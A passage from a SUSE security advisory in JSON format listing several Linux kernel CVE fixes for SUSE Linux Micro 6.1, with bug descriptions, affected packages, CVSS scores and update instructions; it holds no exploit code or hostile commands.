"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68208"
},
{
"cve": "CVE-2025-68209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlx5: Fix default values in create CQ\n\nCurrently, CQs without a completion function are assigned the\nmlx5_add_cq_to_tasklet function by default. This is problematic since\nonly user CQs created through the mlx5_ib driver are intended to use\nthis function.\n\nAdditionally, all CQs that will use doorbells instead of polling for\ncompletions must call mlx5_cq_arm. However, the default CQ creation flow\nleaves a valid value in the CQ\u0027s arm_db field, allowing FW to send\ninterrupts to polling-only CQs in certain corner cases.\n\nThese two factors would allow a polling-only kernel CQ to be triggered\nby an EQ interrupt and call a completion function intended only for user\nCQs, causing a null pointer exception.\n\nSome areas in the driver have prevented this issue with one-off fixes\nbut did not address the root cause.\n\nThis patch fixes the described issue by adding defaults to the create CQ\nflow. It adds a default dummy completion function to protect against\nnull pointer exceptions, and it sets an invalid command sequence number\nby default in kernel CQs to prevent the FW from sending an interrupt to\nthe CQ until it is armed. User CQs are responsible for their own\ninitialization values.\n\nCallers of mlx5_core_create_cq are responsible for changing the\ncompletion function and arming the CQ per their needs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68209",
"url": "https://www.suse.com/security/cve/CVE-2025-68209"
},
{
"category": "external",
"summary": "SUSE Bug 1255230 for CVE-2025-68209",
"url": "https://bugzilla.suse.com/1255230"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68209"
},
{
"cve": "CVE-2025-68217",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68217"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: pegasus-notetaker - fix potential out-of-bounds access\n\nIn the pegasus_notetaker driver, the pegasus_probe() function allocates\nthe URB transfer buffer using the wMaxPacketSize value from\nthe endpoint descriptor. An attacker can use a malicious USB descriptor\nto force the allocation of a very small buffer.\n\nSubsequently, if the device sends an interrupt packet with a specific\npattern (e.g., where the first byte is 0x80 or 0x42),\nthe pegasus_parse_packet() function parses the packet without checking\nthe allocated buffer size. This leads to an out-of-bounds memory access.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68217",
"url": "https://www.suse.com/security/cve/CVE-2025-68217"
},
{
"category": "external",
"summary": "SUSE Bug 1255221 for CVE-2025-68217",
"url": "https://bugzilla.suse.com/1255221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68217"
},
{
"cve": "CVE-2025-68218",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68218"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-multipath: fix lockdep WARN due to partition scan work\n\nBlktests test cases nvme/014, 057 and 058 fail occasionally due to a\nlockdep WARN. As reported in the Closes tag URL, the WARN indicates that\na deadlock can happen due to the dependency among disk-\u003eopen_mutex,\nkblockd workqueue completion and partition_scan_work completion.\n\nTo avoid the lockdep WARN and the potential deadlock, cut the dependency\nby running the partition_scan_work not by kblockd workqueue but by\nnvme_wq.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68218",
"url": "https://www.suse.com/security/cve/CVE-2025-68218"
},
{
"category": "external",
"summary": "SUSE Bug 1255245 for CVE-2025-68218",
"url": "https://bugzilla.suse.com/1255245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68218"
},
{
"cve": "CVE-2025-68222",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68222"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: s32cc: fix uninitialized memory in s32_pinctrl_desc\n\ns32_pinctrl_desc is allocated with devm_kmalloc(), but not all of its\nfields are initialized. Notably, num_custom_params is used in\npinconf_generic_parse_dt_config(), resulting in intermittent allocation\nerrors, such as the following splat when probing i2c-imx:\n\n WARNING: CPU: 0 PID: 176 at mm/page_alloc.c:4795 __alloc_pages_noprof+0x290/0x300\n [...]\n Hardware name: NXP S32G3 Reference Design Board 3 (S32G-VNP-RDB3) (DT)\n [...]\n Call trace:\n __alloc_pages_noprof+0x290/0x300 (P)\n ___kmalloc_large_node+0x84/0x168\n __kmalloc_large_node_noprof+0x34/0x120\n __kmalloc_noprof+0x2ac/0x378\n pinconf_generic_parse_dt_config+0x68/0x1a0\n s32_dt_node_to_map+0x104/0x248\n dt_to_map_one_config+0x154/0x1d8\n pinctrl_dt_to_map+0x12c/0x280\n create_pinctrl+0x6c/0x270\n pinctrl_get+0xc0/0x170\n devm_pinctrl_get+0x50/0xa0\n pinctrl_bind_pins+0x60/0x2a0\n really_probe+0x60/0x3a0\n [...]\n __platform_driver_register+0x2c/0x40\n i2c_adap_imx_init+0x28/0xff8 [i2c_imx]\n [...]\n\nThis results in later parse failures that can cause issues in dependent\ndrivers:\n\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c0-pins/i2c0-grp0: could not parse node property\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c0-pins/i2c0-grp0: could not parse node property\n [...]\n pca953x 0-0022: failed writing register: -6\n i2c i2c-0: IMX I2C adapter registered\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c2-pins/i2c2-grp0: could not parse node property\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c2-pins/i2c2-grp0: could not parse node property\n i2c i2c-1: IMX I2C adapter registered\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c4-pins/i2c4-grp0: could not parse node property\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c4-pins/i2c4-grp0: could not parse node property\n i2c i2c-2: IMX I2C adapter registered\n\nFix this by initializing s32_pinctrl_desc with devm_kzalloc() instead of\ndevm_kmalloc() in s32_pinctrl_probe(), which sets the previously\nuninitialized fields to zero.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68222",
"url": "https://www.suse.com/security/cve/CVE-2025-68222"
},
{
"category": "external",
"summary": "SUSE Bug 1255218 for CVE-2025-68222",
"url": "https://bugzilla.suse.com/1255218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68222"
},
{
"cve": "CVE-2025-68227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Fix proto fallback detection with BPF\n\nThe sockmap feature allows bpf syscall from userspace, or based\non bpf sockops, replacing the sk_prot of sockets during protocol stack\nprocessing with sockmap\u0027s custom read/write interfaces.\n\u0027\u0027\u0027\ntcp_rcv_state_process()\n syn_recv_sock()/subflow_syn_recv_sock()\n tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB)\n bpf_skops_established \u003c== sockops\n bpf_sock_map_update(sk) \u003c== call bpf helper\n tcp_bpf_update_proto() \u003c== update sk_prot\n\u0027\u0027\u0027\n\nWhen the server has MPTCP enabled but the client sends a TCP SYN\nwithout MPTCP, subflow_syn_recv_sock() performs a fallback on the\nsubflow, replacing the subflow sk\u0027s sk_prot with the native sk_prot.\n\u0027\u0027\u0027\nsubflow_syn_recv_sock()\n subflow_ulp_fallback()\n subflow_drop_ctx()\n mptcp_subflow_ops_undo_override()\n\u0027\u0027\u0027\n\nThen, this subflow can be normally used by sockmap, which replaces the\nnative sk_prot with sockmap\u0027s custom sk_prot. The issue occurs when the\nuser executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops().\nHere, it uses sk-\u003esk_prot to compare with the native sk_prot, but this\nis incorrect when sockmap is used, as we may incorrectly set\nsk-\u003esk_socket-\u003eops.\n\nThis fix uses the more generic sk_family for the comparison instead.\n\nAdditionally, this also prevents a WARNING from occurring:\n\nresult from ./scripts/decode_stacktrace.sh:\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \\\n(net/mptcp/protocol.c:4005)\nModules linked in:\n...\n\nPKRU: 55555554\nCall Trace:\n\u003cTASK\u003e\ndo_accept (net/socket.c:1989)\n__sys_accept4 (net/socket.c:2028 